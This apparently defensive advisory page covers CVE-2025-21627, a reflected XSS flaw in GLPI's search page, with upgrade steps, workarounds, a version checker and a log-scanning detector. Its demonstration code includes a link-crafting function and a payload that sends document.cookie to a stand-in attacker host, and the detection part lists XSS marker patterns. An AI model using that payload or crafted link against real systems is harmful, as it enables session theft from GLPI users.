CVE-2025-21627
📋 TL;DR
GLPI versions before 10.0.18 contain a reflected cross-site scripting (XSS) vulnerability on the search page. Attackers can craft malicious links to execute arbitrary JavaScript in victims' browsers. If anonymous ticket creation is enabled, unauthenticated users can exploit this vulnerability.
💻 Affected Systems
- GLPI (all versions before 10.0.18)
📦 What is this software?
GLPI, the open-source IT asset management and helpdesk/ticketing application maintained by the GLPI Project.
⚠️ Risk & Real-World Impact
Worst Case
An attacker who lures a logged-in GLPI user (an administrator in the worst case) to a crafted link runs JavaScript in that user's browser session: reading session cookies if they are not HttpOnly, performing any action the victim can perform in GLPI (creating accounts, changing configuration, reading tickets and asset data), redirecting the user to a phishing site, or serving a browser exploit as a second stage.
Likely Case
Session hijacking or actions silently performed in the victim's GLPI session, leading to unauthorized access to tickets and asset data, data theft, or privilege escalation within the GLPI application.
If Mitigated
Once 10.0.18 is installed the search page encodes the reflected value and the issue is closed. With only workarounds in place (anonymous ticket creation disabled, a Content Security Policy, WAF rules), exploitation still requires an authenticated victim to open a crafted link, and a strict CSP can stop the injected script from executing; the impact is reduced, not removed.
🎯 Exploit Status
Reflected XSS requires the victim to open an attacker-supplied link (phishing e-mail, chat message, a link planted in a ticket). Once the link is crafted, exploitation is trivial; when anonymous ticket creation is enabled, the vulnerable page is reachable without a GLPI account, so the attacker needs no credentials at all.
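The mechanics behind this bug class, as an added example: a hypothetical search handler that reflects the search term into the response, shown both unescaped (the vulnerable pattern) and entity-encoded (the fix). This is not GLPI code; the path `/search`, the parameter name `q`, and the `attacker.example` / `glpi.example` hosts are assumptions made for the demonstration.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Hypothetical search endpoint written for this page to show the bug class.
# It is NOT GLPI code: the path /search and the parameter name "q" are assumptions.


def render_search_page(query_string: str, escape_output: bool = True) -> str:
    """Return the HTML a server would send for /search?<query_string>.

    escape_output=False reflects the search term verbatim into two HTML
    contexts (an attribute value and element text), which is the reflected-XSS
    pattern. escape_output=True entity-encodes every character that is
    significant in either context (<, >, &, " and ').
    """
    params = parse_qs(query_string, keep_blank_values=True)
    term = params.get("q", [""])[0]
    shown = html.escape(term, quote=True) if escape_output else term
    return (
        "<h1>Search results</h1>\n"
        f'<input type="text" name="q" value="{shown}">\n'
        f"<p>No results for {shown}.</p>"
    )


def craft_malicious_link(base_url: str, payload: str) -> str:
    """Build the kind of link an attacker would send to a victim:
    the payload is URL-encoded so the browser delivers it intact."""
    return f"{base_url}?q={quote(payload, safe='')}"


def contains_live_markup(page: str) -> bool:
    """Demo check: did a raw <script> tag or an unescaped attribute breakout
    ("> followed by a new tag) survive into the response?"""
    lowered = page.lower()
    return "<script" in lowered or '"><' in lowered


def demo() -> dict:
    """Compare the vulnerable and fixed responses for one crafted link."""
    payload = '"><script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    link = craft_malicious_link("https://glpi.example/search", payload)
    query = urlsplit(link).query
    vulnerable_page = render_search_page(query, escape_output=False)
    fixed_page = render_search_page(query, escape_output=True)
    return {
        "link": link,
        "vulnerable_executes": contains_live_markup(vulnerable_page),
        "fixed_executes": contains_live_markup(fixed_page),
        "fixed_page": fixed_page,
    }


if __name__ == "__main__":
    result = demo()
    print(result["link"])
    print("vulnerable page executes payload:", result["vulnerable_executes"])
    print("fixed page executes payload:     ", result["fixed_executes"])
    print(result["fixed_page"])
```

The payload opens with `">` because the term lands inside a quoted attribute first: breaking out of the attribute is what lets the `<script>` tag become live markup. `html.escape(..., quote=True)` neutralises both contexts at once; escaping only `<` and `>` would still leave the attribute breakout in place.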
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 10.0.18
Vendor Advisory: https://github.com/glpi-project/glpi/security/advisories/GHSA-qm8p-jmj2-qfc2
Restart Required: No
Instructions:
1. Back up the GLPI installation directory and the database.
2. Download GLPI 10.0.18 or later from the official repository (https://github.com/glpi-project/glpi/releases).
3. Follow the GLPI upgrade documentation: replace the application files (keeping config/, files/ and any plugin or marketplace content) and run the database update through the web installer or `php bin/console db:update`.
4. Verify the update: the version shown in the administration interface footer and the `GLPI_VERSION` constant in inc/define.php must read 10.0.18 or later.
🔧 Temporary Workarounds
Disable Anonymous Ticket Creation
Prevents unauthenticated exploitation by disabling the anonymous ticket creation feature. Authenticated users can still be targeted with a crafted link, so this is a partial mitigation only.
Navigate to Setup > General > Assistance (helpdesk) tab and set 'Allow anonymous ticket creation' to No.
Implement WAF Rules
Configure the web application firewall to block XSS payloads in search parameters. The WAF must inspect URL-decoded values (including double-encoded ones), otherwise the rule is trivially bypassed.
Enable the OWASP Core Rule Set XSS rules for ModSecurity (REQUEST-941-APPLICATION-ATTACK-XSS.conf, rule IDs 941xxx) or the equivalent rule set on your WAF, and tune them against false positives on legitimate search terms.
🧯 If You Can't Patch
- Disable anonymous ticket creation in the GLPI configuration so that an attacker at least needs an account to reach the vulnerable page.
- Add a Content-Security-Policy header at the web server that disallows inline scripts (a script-src directive without 'unsafe-inline'). Test this in report-only mode first: GLPI and its plugins may rely on inline scripts, and a policy that breaks the UI will be switched off again.
🔍 How to Verify
Check if Vulnerable:
Any GLPI installation running a version earlier than 10.0.18 is affected. Read the version from the administration interface (page footer, or Setup > General > System tab) or from the installation files.
Check Version:
On the server, run `grep GLPI_VERSION inc/define.php` inside the GLPI directory: the version is declared there as `define('GLPI_VERSION', '...')`. Note that config/config_db.php holds only the database credentials and says nothing about the version.
Verify Fix Applied:
Confirm the version reads 10.0.18 or later, then submit a harmless marker such as <b>xsstest</b> through the search page: the fixed version renders it as literal text (it appears as &lt;b&gt; in the page source) rather than as markup.
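A version check that can be run across a fleet of GLPI servers, as an added example (not GLPI or vendor tooling). It reads the `GLPI_VERSION` constant out of inc/define.php and compares it against 10.0.18 numerically; the `SAMPLE_DEFINE_PHP` excerpt is constructed for the demo and the `-dev` suffix handling is an assumption about how pre-release builds are labelled.

```python
import re
from pathlib import Path

# Added example (not GLPI code). GLPI declares its version in inc/define.php as
#   define('GLPI_VERSION', '10.0.18');
# The first release that fixes CVE-2025-21627 is 10.0.18.
FIXED_VERSION = (10, 0, 18)

DEFINE_RE = re.compile(
    r"""define\(\s*['"]GLPI_VERSION['"]\s*,\s*['"]([^'"]+)['"]\s*\)"""
)


def extract_version(define_php: str) -> str:
    """Return the GLPI_VERSION string found in the contents of inc/define.php."""
    m = DEFINE_RE.search(define_php)
    if not m:
        raise ValueError("GLPI_VERSION not found; is this inc/define.php?")
    return m.group(1)


def split_version(version: str) -> tuple:
    """'10.0.18-dev' -> ((10, 0, 18), 'dev'); '10.0.9' -> ((10, 0, 9), '')."""
    base, _, suffix = version.partition("-")
    return tuple(int(p) for p in base.split(".")), suffix


def is_vulnerable(version: str) -> bool:
    """True when the version predates the fix.

    Compare numeric components as integers, never as strings: as strings,
    '10.0.9' sorts after '10.0.18' and would wrongly pass. A pre-release of
    10.0.18 itself (assumed to be labelled like '10.0.18-dev') is treated as
    unfixed as well.
    """
    parts, suffix = split_version(version)
    if parts < FIXED_VERSION:
        return True
    return parts == FIXED_VERSION and bool(suffix)


def check_install(glpi_root: str) -> dict:
    """Read <glpi_root>/inc/define.php and report the installation's status."""
    version = extract_version(Path(glpi_root, "inc", "define.php").read_text())
    return {"version": version, "vulnerable": is_vulnerable(version)}


# Constructed excerpt of inc/define.php from an unpatched install (not a real file).
SAMPLE_DEFINE_PHP = """<?php
define('GLPI_VERSION', '10.0.17');
"""

if __name__ == "__main__":
    v = extract_version(SAMPLE_DEFINE_PHP)
    verdict = "VULNERABLE, upgrade to 10.0.18 or later" if is_vulnerable(v) else "fixed"
    print(f"GLPI {v}: {verdict}")
```

Call `check_install("/var/www/glpi")` (path is an example) on a real host; the integer comparison is the part worth keeping, since a string comparison silently passes 10.0.9.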
📡 Detection & Monitoring
Log Indicators:
- Web server access-log entries for GLPI whose search parameters contain HTML tags or JavaScript, in plain or URL-encoded form (e.g. %3Cscript%3E). GLPI's own log files under files/_log/ do not record search terms, so the web server log is the source to watch.
- An existing GLPI session suddenly used from a different source IP or User-Agent shortly after such a request, which is the signature of a hijacked session.
Network Indicators:
- HTTP requests to the GLPI search page whose query string carries script markers (<script> tags, javascript: URIs, on*= event handlers), plain, URL-encoded or double-encoded.
SIEM Query (Splunk-style pseudo-query against the web server access log; a plain match on "<script>" misses URL-encoded payloads, so either include the encoded forms as below or decode the query string before matching):
source="glpi_access_logs" AND (uri_query="*<script*" OR uri_query="*%3Cscript*" OR uri_query="*javascript:*" OR uri_query="*javascript%3A*" OR uri_query="*onerror=*" OR uri_query="*onerror%3D*")
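The log indicators above, run over sample access-log lines as an added example (not GLPI or vendor code). It parses combined-format web server logs, URL-decodes each query parameter until the value is stable so double-encoded payloads are caught, and flags the XSS markers listed under Network Indicators. The sample lines are constructed for the demo, and the `/search.php` path and `q` parameter are assumptions, not GLPI's real search endpoint.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Added detection example, not GLPI or vendor code. The search path /search.php and
# the parameter "q" are assumptions; point scan_log at your real access log.

# Markers of reflected-XSS probing in a decoded parameter value.
XSS_MARKERS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "injected_tag": re.compile(r"<\s*(img|svg|iframe|object|embed|body)\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
}

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """URL-decode until stable so %253C (double-encoded '<') is not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line: str):
    """Return a finding dict for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    hits = []
    # parse_qsl already applies one round of URL decoding and turns '+' into ' '.
    for name, raw in parse_qsl(target.query, keep_blank_values=True):
        value = fully_decode(raw)
        markers = [label for label, rx in XSS_MARKERS.items() if rx.search(value)]
        if markers:
            hits.append({"param": name, "value": value, "markers": markers})
    if not hits:
        return None
    return {"ip": m.group("ip"), "timestamp": m.group("ts"),
            "path": target.path, "status": m.group("status"), "hits": hits}


def scan_log(text: str) -> list:
    """Scan every line of an access log and return the findings in order."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


# Constructed sample lines: a benign request, a plain payload, a double-encoded
# payload that a naive "*<script>*" SIEM match would miss, and a javascript: URI.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2025:12:00:01 +0000] "GET /front/ticket.php?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2025:12:00:05 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jan/2025:12:00:09 +0000] "GET /search.php?q=printer%20%2522%253E%253Cimg%2520src%3Dx%2520onerror%3Dalert(1)%253E HTTP/1.1" 200 3310 "-" "curl/8.4.0"
203.0.113.9 - - [10/Jan/2025:12:00:12 +0000] "GET /search.php?q=javascript%3Aalert(1) HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        for hit in finding["hits"]:
            print(f'{finding["timestamp"]} {finding["ip"]} {finding["path"]} '
                  f'{hit["param"]}={hit["value"]!r} -> {", ".join(hit["markers"])}')
```

The `event_handler` pattern will also match innocent parameter values such as `online=1`, so treat a single marker as a lead and the combination of an injected tag plus an event handler, or a hit from a source that then reuses someone else's session, as the actionable signal.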